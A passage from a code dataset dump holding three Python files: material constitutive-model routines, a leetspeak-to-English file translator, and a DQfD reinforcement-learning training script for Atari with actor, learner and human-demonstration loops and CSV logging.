# matrix\n dsigma_kk = 3.*P.S.K*de_kk # scalar\n# dev_work_norm = norm(tensordot(MP.dev_stress,de_ij)) # scalar\n dev_work_norm = abs(sum(sum(MP.dev_stress*de_ij))) # scalar\n dev_stress_norm = sqrt(sum(sum(MP.dev_stress**2))) # scalar\n MP.dev_dstress = 2.*P.S.G*(de_ij - dev_work_norm/(2.*(P.S.k**2))*\n ((dev_stress_norm/(sqrt(2.)*P.S.k))**(P.S.s-2.))*MP.dev_stress) # matrix\n MP.sigma_kk += dsigma_kk # scalar\n MP.dev_stress += MP.dev_dstress # matrix\n MP.dstress = (MP.dev_stress + MP.sigma_kk*eye(3)/3.) - MP.stress # matrix\n MP.stress = MP.dev_stress + MP.sigma_kk*eye(3)/3. # matrix\n MP.yieldfunction = dev_stress_norm/(sqrt(2.)*P.S.k) - 1. # scalar\n MP.gammadot = sqrt(sum(sum(de_ij**2)))\n MP.pressure = trace(MP.stress)/3.\n MP.sigmav = MP.stress[1,1]\n MP.sigmah = MP.stress[0,0]\n\n for r in xrange(4):\n n = G.nearby_nodes(MP.n_star,r,P)\n G.pressure[n] += MP.N[r]*MP.pressure*MP.m\n G.yieldfunction[n] += MP.N[r]*MP.yieldfunction*MP.m\n G.gammadot[n] += MP.N[r]*MP.gammadot/P.dt*MP.m\n G.sigmav[n] += MP.N[r]*MP.sigmav*MP.m\n G.sigmah[n] += MP.N[r]*MP.sigmah*MP.m\n G.dev_stress[n] += MP.N[r]*norm(MP.dev_stress)*MP.m\n G.dev_stress_dot[n] += MP.N[r]*norm(MP.dev_dstress)/P.dt*MP.m\n\ndef dp(MP,P,G):\n# if P.t < .1: # isotropic loading\n# dstrain = eye(3)*1e-4*P.dt\n# elif P.t < .2: # shear\n# dstrain = 3e-8*ones((3,3))\n# dstrain = dstrain - eye(3)*trace(dstrain)/3.\n# else: # unload shear\n# dstrain = -2e-8*ones((3,3))\n# dstrain = dstrain - eye(3)*trace(dstrain)/3.\n dstrain = -MP.dstrain\n strain = -MP.strain\n stress = -MP.stress\n \n de_kk = trace(dstrain)\n de_ij = dstrain - de_kk*eye(3)/3.\n MP.p = trace(stress)/3.\n s_ij = stress - eye(3)*MP.p\n MP.q = sqrt(3.*sum(sum(s_ij*s_ij))/2.)\n \n MP.y = MP.q/(P.S.beta*MP.p + (P.S.mu-P.S.beta)*MP.p) - 1.\n# if MP.y > 0.:\n# print 'WARNING: y is: ' + str(MP.y)\n lambda_2 = ((3.*P.S.G*MP.p*sum(sum(s_ij*de_ij)) - P.S.K*MP.q**2.*de_kk)/\n (3.*P.S.G*P.S.mu*MP.p**2 + P.S.K*P.S.beta*MP.q**2))\n Gamma_2 = lambda_2*(lambda_2>0)\n dstress = (2.*P.S.G*(de_ij - 3./2.*s_ij/MP.q*Gamma_2*(MP.q/(P.S.mu*MP.p))**(P.S.s-1.)) +\n P.S.K*eye(3)*(de_kk + P.S.beta*Gamma_2*(MP.q/(P.S.mu*MP.p))**P.S.s))\n \n MP.dstress = -dstress\n MP.stress += MP.dstress\n \ndef inviscid(MP,P,G):\n MP.dstress = 0\n MP.stress = -P.F.P_0*eye(3)\n\ndef viscous(MP,P,G):\n MP.stress = 2.*(P.F.mu*MP.dstrain/P.dt\n - P.F.mu*trace(MP.dstrain/P.dt)*eye(3)/3.\n - P.F.P*eye(3)/2.)\n\ndef compressible(MP,P,G):\n MP.rho = MP.rho/(1 + trace(MP.dstrain))\n MP.V = MP.m/MP.rho\n P_hat = MP.eq_of_state(P) # pressure\n MP.strain_rate = MP.dstrain/P.dt\n MP.stress = 2.*(P.F.mu*MP.strain_rate\n - P.F.mu*trace(MP.strain_rate)*eye(3)/3.\n - P_hat*eye(3)/2.)\n MP.int_energy += trace(MP.stress.T*MP.dstrain)/MP.rho\n\n","sub_path":"constit.py","file_name":"constit.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"603744415","text":"def toEng(file):\n\tcharsToEng = {\n\t\t'4': 'A',\n\t\t'8': 'B',\n\t\t'@': 'a',\n\t\t# leet digits cannot encode letter case, so each digit maps to a\n\t\t# single lowercase letter (a dict literal keeps only the last value\n\t\t# for a repeated key)\n\t\t'3': 'e',\n\t\t'1': 'l',\n\t\t'0': 'o',\n\t\t'5': 's',\n\t\t'7': 't',\n\t}\n\n\tfor char in charsToEng:\n\t\tfile = file.replace(char, charsToEng.get(char))\n\n\treturn file\n\ndef main():\n\tprint(\"Welcome to the translator\")\n\tleetFileName = input(\"What is the file you would like translated? \")\n\tengFileName = input(\"What is the file you would like the translation to be stored? 
\")\n\tleetFile = open(leetFileName)\n\tengFile = open(engFileName, \"w\")\n\tleetList = leetFile.readlines()\n\tcleanLeet = []\n\tfor i in leetList:\n\t\tcleanLeet.append(i.strip())\n\tfor i in cleanLeet:\n\t\tengFile.write(toEng(i))\n\t\tengFile.write('\\n')\n\tleetFile.close()\n\tengFile.close()\n\n\nmain()","sub_path":"leetSpeak.py","file_name":"leetSpeak.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"458937905","text":"# -*- coding: utf-8 -*\nimport matplotlib\n# matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom gym import wrappers\nimport gym\nimport numpy as np\nimport pickle\nfrom Config import Config, DDQNConfig, DQfDConfig\nfrom DQfD import DQfD\n#from DQfDDDQN import DQfDDDQN\nfrom collections import deque\nimport itertools\nimport scipy.signal\nimport time\nfrom helper import *\nimport threading\nfrom Memory import Memory\nfrom PIL import Image\nimport math\nimport csv\nfrom datetime import datetime\nimport gc\n\n\n\nimport sys\nfrom random import shuffle\ndef process_frame(frame):\n s = scipy.misc.imresize(frame, [84, 84, 3])\n s = s / 255.0\n return s\n\ndef load_image( infilename ) :\n img = Image.open( infilename )\n img.load()\n data = np.asarray( img, dtype=\"float32\" )/255.0\n data = process_frame(data)\n return data\n\ndef openLog(directory, filename, rlist):\n createTime = datetime.now().strftime('%Y-%m-%d:%H:%M:%S')\n with open(directory + str(createTime) + filename + '.csv', 'w') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerow(rlist)\n myfile.close()\n return str(createTime) + filename\ndef writeLog( directory, filename, rlist):\n with open(directory + filename + '.csv', 'a') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerow(rlist)\n myfile.close()\n\n\n\ndef step(i,f, episode):\n\n\n\n line = f.readline()\n traj = line[:-1].split(\",\")\n episodeEnd = False\n if not line:\n episodeEnd = True\n f.close()\n return '','', '', '', episodeEnd\n state = load_image(screenpath + gameName + \"/\" + str(episode) + \"/\" + str(i) + \".png\")\n #print(screenpath + gameName + \"/\" + str(episode) + \"/\" + str(i) + \".png\")\n #print(traj)\n #print(i)\n #if(traj[3] == \"False\"): done = False\n #else : done = True\n done = bool(int(traj[3]))\n\n action = int(traj[4])\n translatedAction = actionTranslator[action]\n return state, float(traj[1]), done, translatedAction, episodeEnd\n\ndef goNextEpisode(count,file, episode):\n\n\n count = 0\n file = open(trajpath + gameName + \"/\" + str(episode) + \".txt\", 'r')\n file.readline()\n file.readline()\n return count,file\n\ndef set_n_step(container, n, ts):\n #print(container)\n t_list = list(container)\n # accumulated reward of first (trajectory_n-1) transitions\n n_step_reward = sum([t[2] * Config.GAMMA**i for i, t in enumerate(t_list[0:min(len(t_list), n) - 1])])\n for begin in range(len(t_list)):\n end = min(len(t_list) - 1, begin + Config.trajectory_n - 1)\n n_step_reward += t_list[end][2]*Config.GAMMA**(end-begin)\n # extend[n_reward, n_next_s, n_done, actual_n]\n t_list[begin].extend([n_step_reward, t_list[end][3], t_list[end][4], end-begin+1, ts])\n n_step_reward = (n_step_reward - t_list[begin][2])/Config.GAMMA\n return t_list\n\n\n\ndef actionTranslate(gymActions, dataSetActions):\n actionTranslation = []\n length = 0\n for action in dataSetActions :\n i = 0\n for gymAction in gymActions :\n if(action == gymAction):\n 
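# (A side note on process_frame above: scipy.misc.imresize was removed in
# SciPy 1.3, so a drop-in sketch using Pillow, assuming bilinear resampling
# is an acceptable match for imresize's default:)
import numpy as np
from PIL import Image

def process_frame_pil(frame):
    # Resize an HxWx3 uint8 frame to 84x84 and scale to [0, 1],
    # mirroring scipy.misc.imresize(frame, [84, 84, 3]) / 255.0.
    img = Image.fromarray(frame.astype(np.uint8)).resize((84, 84), Image.BILINEAR)
    return np.asarray(img, dtype=np.float32) / 255.0

print(process_frame_pil(np.zeros((210, 160, 3), dtype=np.uint8)).shape)  # (84, 84, 3)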
actionTranslation.append(i)\n i = i+1\n if(length == actionTranslation.__len__()):\n actionTranslation.append(0)\n length = actionTranslation.__len__()\n return actionTranslation\n\n\ndef map_scores(dqfd_scores=None, ddqn_scores=None, xlabel=None, ylabel=None):\n if dqfd_scores is not None:\n plt.plot(dqfd_scores, 'r')\n if ddqn_scores is not None:\n plt.plot(ddqn_scores, 'b')\n if xlabel is not None:\n plt.xlabel(xlabel)\n if ylabel is not None:\n plt.ylabel(ylabel)\n plt.show()\ndef sign(x): return 1 if x >= 0 else -1\n\nclass Learner(object):\n def __init__(self, name, agent):\n self.name = name\n self.learner = agent\n def run(self):\n global train_itr\n episode_frames = []\n train_itr = 0\n\n scores, e, replay_full_episode = [], 0, None\n sample_log = openLog(Config.LEARNER_DATA_PATH + 'sampleexp/', '', ['step', 'value', 'age', 'demo', 'q_value'])\n replay_log = openLog(Config.LEARNER_DATA_PATH + 'replaymemory/', '', ['step', 'root_priority', 'root_ts', 'root_demo', 'alpha', 'beta'])\n\n while not self.learner.replay_memory.full() :\n time.sleep(1)\n \n for i in range(Config.LEARNER_TRAINING_STEP) :\n # print(agent.replay_memory.full())\n #print(self.learner.replay_memory.tree.data_pointer)\n start_time = time.time()\n\n self.learner.train_Q_network(update=False) # train along with generation\n train_itr += 1\n replay_full_episode = replay_full_episode or e\n if(train_itr % 100 == 0) :\n print(\"learner--- %s seconds ---\" % (time.time() - start_time))\n #print(sys.getsizeof(self.learner.replay_memory.tree.timetree))\n if(train_itr % Config.LEARNER_TRAINING_PART == 0):\n self.learner.save_model()\n sample_demo = float(self.learner.demo_num) / (Config.LEARNER_TRAINING_PART*Config.BATCH_SIZE)\n sample_value = math.pow(self.learner.sum_abs_error / (Config.LEARNER_TRAINING_PART*Config.BATCH_SIZE), 0.4)\n sample_age = self.learner.sum_age / (Config.LEARNER_TRAINING_PART*Config.BATCH_SIZE)\n print(\"learner_sample\")\n print(sample_value)\n print(sample_age)\n print(sample_demo)\n\n print(\"replay_memory\")\n print(self.learner.replay_memory.tree.total_p)\n writeLog(Config.LEARNER_DATA_PATH + 'sampleexp/', sample_log,\n [str(train_itr), str(sample_value), str(sample_age), str(sample_demo)])\n writeLog(Config.LEARNER_DATA_PATH + 'replaymemory/', replay_log,\n [str(train_itr),\n str(self.learner.replay_memory.tree.total_p),\n str(self.learner.replay_memory.tree.total_ts),\n str(self.learner.replay_memory.tree.total_d),\n str(self.learner.replay_memory.tree.alpha),\n str(self.learner.replay_memory.tree.beta)])\n\n self.learner.sum_abs_error = 0\n self.learner.demo_num = 0\n self.learner.sum_age = 0\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n self.learner.sess.run(self.learner.update_target_net)\nclass Actor(object):\n def __init__(self, name, env, agent, local):\n self.name = name\n self.env = env\n self.learner = agent\n self.actor = local\n def run(self):\n global train_itr\n episode_frames = []\n episode_count = 0\n deleted_value = 0\n deleted_age = 0\n deleted_demo = 0\n\n pre_score = 0\n pre_train_itr = 0\n #\n lock = threading.Lock()\n print(self.name)\n\n count = 0 \n scores, e, replay_full_episode = [], 0, None\n filename = ''\n if(self.name == \"actor0\"):\n delete_log = openLog(Config.ACTOR_DATA_PATH+'deletedexp/', 'deletedExp', ['step', 'train_itr','value', 'age', 'demo'])\n episode_log = openLog(Config.ACTOR_DATA_PATH + 'episodescore/', '', ['episode', 'score'])\n while not coord.should_stop():\n done, score, n_step_reward, state = False, 0, None, self.env.reset()\n state = 
process_frame(state)\n t_q = deque(maxlen=Config.trajectory_n)\n\n while done is False:\n startTime = time.time()\n if(self.actor.replay_memory.full()):\n time.sleep(Config.ACTOR_SLEEP) # print(index + \" running!\")\n action = self.actor.egreedy_action(state) # e-greedy action for train\n next_state, reward, done, _ = self.env.step(action)\n # env.render()\n episode_frames.append(next_state)\n next_state = process_frame(next_state)\n # print(next_state)\n score += reward\n reward = sign(reward) * math.log(1 + abs(reward)) if not done else sign(-100) * math.log(1 + abs(-100))\n reward_to_sub = 0. if len(t_q) < t_q.maxlen else t_q[0][2] # record the earliest reward for the sub\n t_q.append([state, action, reward, next_state, done, 0.0])\n\n if len(t_q) == t_q.maxlen:\n if n_step_reward is None: # only compute once when t_q first filled\n n_step_reward = sum([t[2] * Config.GAMMA ** i for i, t in enumerate(t_q)])\n else:\n n_step_reward = (n_step_reward - reward_to_sub) / Config.GAMMA\n n_step_reward += reward * Config.GAMMA ** (Config.trajectory_n - 1)\n t_q[0].extend([n_step_reward, next_state, done, t_q.maxlen, self.learner.time_step]) # actual_n is max_len here\n self.actor.perceive(t_q[0], self.learner.time_step) # perceive when a transition is completed\n #print(demo)\n # print(t_q[0][3])\n #print(self.learner.time_step)\n count = count +1\n if(count % Config.ACTOR_ACTING_PART == 0 and \"actor0\" == self.name):\n print(self.name + \"--- %s seconds ---\" % (time.time() - startTime) + \"/\"+str(self.actor.replay_memory.tree.data_pointer))\n if(count % Config.ACTOR_ACTING_PART == 0 and \"actor0\" == self.name ):\n\n self.learner.save_model()\n sample_demo = float(self.learner.demo_num) / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n sample_value = math.pow(\n self.learner.sum_abs_error / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE), 0.4)\n sample_age = self.learner.sum_age / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n print(\"learner_sample\")\n print(sample_value)\n print(sample_age)\n print(sample_demo)\n\n print(\"replay_memory\")\n print(self.learner.replay_memory.tree.total_p)\n writeLog(Config.LEARNER_DATA_PATH + 'sampleexp/', sample_log,\n [str(train_itr), str(sample_value), str(sample_age), str(sample_demo)])\n writeLog(Config.LEARNER_DATA_PATH + 'replaymemory/', replay_log,\n [str(train_itr),\n str(self.learner.replay_memory.tree.total_p),\n str(self.learner.replay_memory.tree.total_ts),\n str(self.learner.replay_memory.tree.total_d),\n str(self.learner.replay_memory.tree.alpha),\n str(self.learner.replay_memory.tree.beta)])\n\n self.learner.sum_abs_error = 0\n self.learner.demo_num = 0\n self.learner.sum_age = 0\n\n sum_value = self.actor.replay_memory.tree.avg_val / Config.ACTOR_ACTING_PART\n sum_age = self.actor.replay_memory.tree.avg_time / Config.ACTOR_ACTING_PART\n sum_demo = self.actor.replay_memory.tree.avg_demo / Config.ACTOR_ACTING_PART\n print(\"actor_deleted\")\n print(sum_value)\n print(sum_age)\n print(sum_demo)\n writeLog( Config.ACTOR_DATA_PATH +'deletedexp/', delete_log, [str(count), str(train_itr), str(sum_value), str(sum_age), str(sum_demo)] )\n self.actor.replay_memory.tree.avg_val = 0\n self.actor.replay_memory.tree.avg_time = 0\n self.actor.replay_memory.tree.avg_demo = 0\n if self.actor.replay_memory.full():\n replay_full_episode = replay_full_episode or e\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"actor_update_target\"+str(train_itr))\n self.actor.sess.run(self.actor.update_target_net)\n train_itr += 1\n state = 
next_state\n if done:\n # handle transitions left in t_q\n train_itr += 1\n t_q.popleft() # first transition's n-step is already set\n transitions = set_n_step(t_q, Config.trajectory_n, self.learner.time_step)\n\n for t in transitions:\n self.actor.perceive(t, self.learner.time_step)\n if self.actor.replay_memory.full():\n replay_full_episode = replay_full_episode or e\n if self.actor.replay_memory.full():\n delta = score - pre_score\n actor_num = Config.actor_num\n sub_train_itr = train_itr - pre_train_itr\n #print(sub_train_itr)\n self.actor.replay_memory.update_alpha_and_beta(delta, actor_num, sub_train_itr)\n pre_train_itr = train_itr\n\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"actor_update_target\")\n self.actor.sess.run(self.actor.update_target_net)\n\n #scores.append(score)\n if replay_full_episode is not None:\n print(\"episode: {} trained-episode: {} score: {} memory length: {} epsilon: {}\"\n .format(e, e - replay_full_episode, score, len(self.actor.replay_memory), self.actor.epsilon))\n if(self.name == \"actor0\"):\n writeLog(Config.ACTOR_DATA_PATH + 'episodescore/', episode_log,\n [str(episode_count), str(score)])\n\n # 주기적으로 에피소드의 gif 를 저장하고, 모델 파라미터와 요약 통계량을 저장한다.\n if episode_count % Config.GIF_STEP == 0 and episode_count != 0 and self.name == 'actor0':\n time_per_step = 0.01\n images = np.array(episode_frames)\n make_gif(images, './frames/dqfd_image' + str(episode_count) + '.gif',\n duration=len(images) * time_per_step, true_image=True, salience=False)\n episode_count = episode_count + 1\n episode_frames = []\n pre_score = score\n # if np.mean(scores[-min(10, len(scores)):]) > 495:\n # break\n # agent.save_model()\n\n e += 1\n print(\"actor end\")\n return scores\n\nclass Human(object):\n def __init__(self, name, agent, local, episodeList):\n self.name = name\n self.learner = agent\n self.human = local\n self.episodeList = episodeList\n self.episode = self.i = self.f = None\n def run(self):\n print(self.name)\n global train_itr\n while True :\n random.shuffle(self.episodeList)\n self.episode = self.episodeList[0]\n self.i, self.f = goNextEpisode(self.i, self.f, self.episode)\n for n in range(1, episodeList.__len__()):\n done, score, n_step_reward, state = False, 0, None, np.zeros([83, 83, 3], dtype=np.float32)\n state = process_frame(state)\n episodeEnd = False\n t_q = deque(maxlen=Config.trajectory_n)\n while (not episodeEnd):\n\n startTime = time.time()\n next_state, reward, done, action, episodeEnd = step(self.i, self.f, self.episode)\n a = self.human.sess.run(self.human.update_local_ops)\n asum = 0\n for i in a[5]:\n asum = asum + i\n #print(asum)\n self.i = self.i + 1\n if (episodeEnd):\n break\n score += reward\n reward = sign(reward) * math.log(1 + abs(reward)) if not done else sign(-100) * math.log(1 + abs(-100))\n\n\n reward_to_sub = 0. 
if len(t_q) < t_q.maxlen else t_q[0][2] # record the earliest reward for the sub\n t_q.append([state, action, reward, next_state, done, 1.0])\n # print(next_state)\n if len(t_q) == t_q.maxlen:\n if n_step_reward is None: # only compute once when t_q first filled\n n_step_reward = sum([t[2] * Config.GAMMA ** i for i, t in enumerate(t_q)])\n else:\n n_step_reward = (n_step_reward - reward_to_sub) / Config.GAMMA\n n_step_reward += reward * Config.GAMMA ** (Config.trajectory_n - 1)\n\n t_q[0].extend([n_step_reward, next_state, done, t_q.maxlen, self.learner.time_step]) # actual_n is max_len here\n self.human.perceive(t_q[0], self.learner.time_step) # perceive when a transition is completed\n if(self.i % Config.ACTOR_ACTING_PART == 0):\n print(self.name + \"--- %s seconds ---\" % (time.time() - startTime))\n state = next_state\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"human_update_target\")\n self.human.sess.run(self.human.update_target_net)\n\n if (episodeEnd):\n # handle transitions left in t_q\n print(\"human : episode end\")\n t_q.popleft() # first transition's n-step is already set\n transitions = set_n_step(t_q, Config.trajectory_n, self.learner.time_step)\n for t in transitions:\n self.human.perceive(t, self.learner.time_step)\n if self.human.replay_memory.full():\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"human_update_target\")\n self.human.sess.run(self.human.update_target_net)\n self.episode = self.episodeList[n]\n self.i, self.f = goNextEpisode(self.i, self.f, self.episode)\n\n if len(scores) >= Config.episode:\n break\n # e += 1\n\n\nclass Trainer():\n def __init__(self, name, env, agent, episodeList):\n self.name = name\n self.env = env\n self.agent = agent\n self.episodeList = episodeList\n self.episode = self.i = self.f = None\n def run(self):\n train_itr = 0\n learn_count = 0\n episode_frames = []\n episode_count = 0\n deleted_value = 0\n deleted_age = 0\n deleted_demo = 0\n\n pre_score = 0\n pre_train_itr = 0\n #\n lock = threading.Lock()\n print(self.name)\n\n count = 0\n scores, e, replay_full_episode = [], 0, None\n filename = ''\n\n random.shuffle(self.episodeList)\n epsidoe_list_count = 0\n self.episode = self.episodeList[epsidoe_list_count]\n self.i, self.f = goNextEpisode(self.i, self.f, self.episode)\n episodeEnd = False\n\n sample_log = openLog(Config.LEARNER_DATA_PATH + 'sampleexp/', '', ['step', 'value', 'age', 'demo', 'qvalue'])\n replay_log = openLog(Config.LEARNER_DATA_PATH + 'replaymemory/', '', ['step', 'root_priority', 'root_ts', 'root_demo', 'alpha', 'beta'])\n delete_log = openLog(Config.ACTOR_DATA_PATH + 'deletedexp/', '', ['step', 'train_itr', 'value', 'age', 'demo'])\n episode_log = openLog(Config.ACTOR_DATA_PATH + 'episodescore/', '', ['episode', 'score'])\n actor_done, actor_score, actor_n_step_reward, actor_state = False, 0, None, self.env.reset()\n human_done, human_score, human_n_step_reward, human_state = False, 0, None, np.zeros([83, 83, 3], dtype=np.float32)\n episodeEnd = False\n t_q_actor = deque(maxlen=Config.trajectory_n)\n t_q_human = deque(maxlen=Config.trajectory_n)\n episode_count = 0\n train_itr = train_itr + 1\n avg_actor_time_step = 0\n act_itr =0\n while (learn_count < Config.LEARNER_TRAINING_STEP):\n\n human_state = process_frame(human_state)\n actor_state = process_frame(actor_state)\n\n while actor_done is False and episodeEnd is False:\n startTime = time.time()\n if(train_itr % Config.ACTOR_HUMAN_COUNT != 0 ):\n action = self.agent.egreedy_action(actor_state) # e-greedy action for train\n 
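# (A quick standalone check, with hypothetical reward values, that the
# sliding n-step update used in these loops,
# R <- (R - r_oldest)/gamma; R += r_new * gamma**(n-1),
# matches recomputing the discounted sum from scratch:)
GAMMA, n = 0.99, 4
rewards = [1.0, 0.5, -0.2, 2.0, 0.3]

R = sum(r * GAMMA ** i for i, r in enumerate(rewards[:n]))
R = (R - rewards[0]) / GAMMA                  # drop the oldest reward
R += rewards[4] * GAMMA ** (n - 1)            # append the newest reward

expected = sum(r * GAMMA ** i for i, r in enumerate(rewards[1:1 + n]))
assert abs(R - expected) < 1e-12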
next_state, reward, actor_done, _ = self.env.step(action)\n # env.render()\n episode_frames.append(next_state)\n next_state = process_frame(next_state)\n # print(next_state)\n actor_score += reward\n reward = sign(reward) * math.log(1 + abs(reward)) if not actor_done else sign(-100) * math.log(1 + abs(-100))\n reward_to_sub = 0. if len(t_q_actor) < t_q_actor.maxlen else t_q_actor[0][2] # record the earliest reward for the sub\n t_q_actor.append([actor_state, action, reward, next_state, actor_done, 0.0])\n\n if len(t_q_actor) == t_q_actor.maxlen:\n if actor_n_step_reward is None: # only compute once when t_q first filled\n actor_n_step_reward = sum([t[2] * Config.GAMMA ** i for i, t in enumerate(t_q_actor)])\n else:\n actor_n_step_reward = (actor_n_step_reward - reward_to_sub) / Config.GAMMA\n actor_n_step_reward += reward * Config.GAMMA ** (Config.trajectory_n - 1)\n t_q_actor[0].extend([actor_n_step_reward, next_state, actor_done, t_q_actor.maxlen, self.agent.time_step]) # actual_n is max_len here\n self.agent.perceive(t_q_actor[0], self.agent.time_step) # perceive when a transition is completed\n # print(demo)\n # print(t_q[0][3])\n # print(self.learner.time_step)\n\n actor_state = next_state\n if (train_itr % Config.ACTOR_HUMAN_COUNT == 0):\n startTime = time.time()\n next_state, reward, human_done, action, episodeEnd = step(self.i, self.f, self.episode)\n self.i = self.i + 1\n if (episodeEnd != True):\n human_score += reward\n reward = sign(reward) * math.log(1 + abs(reward)) if not human_done else sign(-100) * math.log(1 + abs(-100))\n reward_to_sub = 0. if len(t_q_human) < t_q_human.maxlen else t_q_human[0][2] # record the earliest reward for the sub\n t_q_human.append([human_state, action, reward, next_state, human_done, 1.0])\n # print(next_state)\n if len(t_q_human) == t_q_human.maxlen:\n if human_n_step_reward is None: # only compute once when t_q first filled\n human_n_step_reward = sum([t[2] * Config.GAMMA ** i for i, t in enumerate(t_q_human)])\n else:\n human_n_step_reward = (human_n_step_reward - reward_to_sub) / Config.GAMMA\n human_n_step_reward += reward * Config.GAMMA ** (Config.trajectory_n - 1)\n\n\n t_q_human[0].extend([human_n_step_reward, next_state, human_done, t_q_human.maxlen, self.agent.time_step]) # actual_n is max_len here\n self.agent.perceive(t_q_human[0], self.agent.time_step) # perceive when a transition is completed\n human_state = next_state\n train_itr = train_itr + 1\n if self.agent.replay_memory.full():\n self.agent.train_Q_network(update=False) # train along with generation\n learn_count += 1\n if (train_itr % Config.LEARNER_TRAINING_PART == 0):\n self.agent.save_model()\n sample_demo = float(self.agent.demo_num) / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n sample_value = math.pow(\n self.agent.sum_abs_error / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE), 0.4)\n sample_age = self.agent.sum_age / (Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n sample_q = self.agent.qvalue /(Config.LEARNER_TRAINING_PART * Config.BATCH_SIZE)\n print(\"learner_sample\")\n print(sample_value)\n print(sample_age)\n print(sample_demo)\n print(sample_q)\n\n sum_sample_q = 0\n for i in range(6):\n sum_sample_q += sample_q[i]\n print(sum_sample_q)\n self.agent.sum_abs_error = 0\n self.agent.demo_num = 0\n self.agent.sum_age = 0\n self.agent.qvalue = 0\n print(\"replay_memory\")\n print(self.agent.replay_memory.tree.total_p)\n writeLog(Config.LEARNER_DATA_PATH + 'sampleexp/', sample_log,\n [str(train_itr), str(sample_value), str(sample_age), 
str(sample_demo), str(sum_sample_q)])\n writeLog(Config.LEARNER_DATA_PATH + 'replaymemory/', replay_log,\n [str(train_itr),\n str(self.agent.replay_memory.tree.total_p),\n str(self.agent.replay_memory.tree.total_ts),\n str(self.agent.replay_memory.tree.total_d),\n str(self.agent.replay_memory.tree.alpha),\n str(self.agent.replay_memory.tree.beta)])\n gc.collect()\n replay_full_episode = replay_full_episode or e\n if learn_count % Config().UPDATE_TARGET_NET == 0:\n # print(\"actor_update_target\"+str(train_itr))\n self.agent.sess.run(self.agent.update_target_net)\n if(train_itr % 100 == 0):\n print(\"process time : \" + str(time.time() -startTime) + \"/\"+str(self.agent.replay_memory.tree.data_pointer))\n\n if (train_itr % Config.ACTOR_ACTING_PART == 0):\n sum_value = self.agent.replay_memory.tree.avg_val / Config.ACTOR_ACTING_PART\n sum_age = self.agent.replay_memory.tree.avg_time / Config.ACTOR_ACTING_PART\n sum_demo = self.agent.replay_memory.tree.avg_demo / Config.ACTOR_ACTING_PART\n print(\"actor_deleted\")\n print(sum_value)\n print(sum_age)\n print(sum_demo)\n writeLog(Config.ACTOR_DATA_PATH + 'deletedexp/', delete_log,\n [str(count), str(train_itr), str(sum_value), str(sum_age), str(sum_demo)])\n self.agent.replay_memory.tree.avg_val = 0\n self.agent.replay_memory.tree.avg_time = 0\n self.agent.replay_memory.tree.avg_demo = 0\n if actor_done:\n # handle transitions left in t_q\n\n t_q_actor.popleft() # first transition's n-step is already set\n transitions = set_n_step(t_q_actor, Config.trajectory_n, self.agent.time_step)\n\n for t in transitions:\n self.agent.perceive(t, self.agent.time_step)\n if self.agent.replay_memory.full():\n delta = actor_score - pre_score\n actor_num = 1\n sub_train_itr = learn_count - pre_train_itr\n # print(sub_train_itr)\n self.agent.replay_memory.update_alpha_and_beta(delta, actor_num, sub_train_itr)\n pre_train_itr = learn_count\n pre_score = actor_score\n # scores.append(score)\n if replay_full_episode is not None:\n print(\"episode: {} trained-episode: {} score: {} memory length: {} epsilon: {}\"\n .format(e, e - replay_full_episode, actor_score, len(self.agent.replay_memory), self.agent.epsilon))\n writeLog(Config.ACTOR_DATA_PATH + 'episodescore/', episode_log,\n [str(episode_count), str(actor_score)])\n\n # 주기적으로 에피소드의 gif 를 저장하고, 모델 파라미터와 요약 통계량을 저장한다.\n #if episode_count % Config.GIF_STEP == 0 and episode_count != 0 :\n # time_per_step = 0.05\n # images = np.array(episode_frames)\n # make_gif(images, './frames/dqfd_image' + str(episode_count) + '.gif',\n # duration=len(images) * time_per_step, true_image=True, salience=False)\n actor_done, actor_score, actor_n_step_reward, actor_state = False, 0, None, self.env.reset()\n t_q_actor = deque(maxlen=Config.trajectory_n)\n episode_count = episode_count + 1\n episode_frames = []\n\n if (episodeEnd):\n # handle transitions left in t_q\n\n print(\"human : episode end\")\n t_q_human.popleft() # first transition's n-step is already set\n transitions = set_n_step(t_q_human, Config.trajectory_n, self.agent.time_step)\n for t in transitions:\n self.agent.perceive(t, self.agent.time_step)\n if self.agent.replay_memory.full():\n if train_itr % Config().UPDATE_TARGET_NET == 0:\n #print(\"human_update_target\")\n self.agent.sess.run(self.agent.update_target_net)\n epsidoe_list_count += 1\n if(epsidoe_list_count == self.episodeList.__len__()):\n random.shuffle(self.episodeList)\n epsidoe_list_count = 0\n self.episode = self.episodeList[epsidoe_list_count]\n else :\n self.episode = 
self.episodeList[epsidoe_list_count]\n self.i, self.f = goNextEpisode(self.i, self.f, self.episode)\n human_done, human_score, human_n_step_reward, human_state = False, 0, None, np.zeros([83, 83, 3], dtype=np.float32)\n t_q_human = deque(maxlen=Config.trajectory_n)\n episodeEnd = False\n\n e += 1\n print(\"actor end\")\n\nif __name__ == '__main__':\n\n\n\n # env = wrappers.Monitor(env, '/tmp/CartPole-v0', force=True)\n # ------------------------ get demo scores by DDQN -----------------------------\n # get_demo_data(env)\n # -------------------------- get DDQN scores ----------------------------------\n # ddqn_sum_scores = np.zeros(Config.episode)\n # for i in range(Config.iteration):\n # scores = run_DDQN(i, env)\n # ddqn_sum_scores = np.array([a + b for a, b in zip(scores, ddqn_sum_scores)])\n # ddqn_mean_scores = ddqn_sum_scores / Config.iteration\n # with open('./ddqn_mean_scores.p', 'wb') as f:\n # pickle.dump(ddqn_mean_scores, f, protocol=2)\n #with 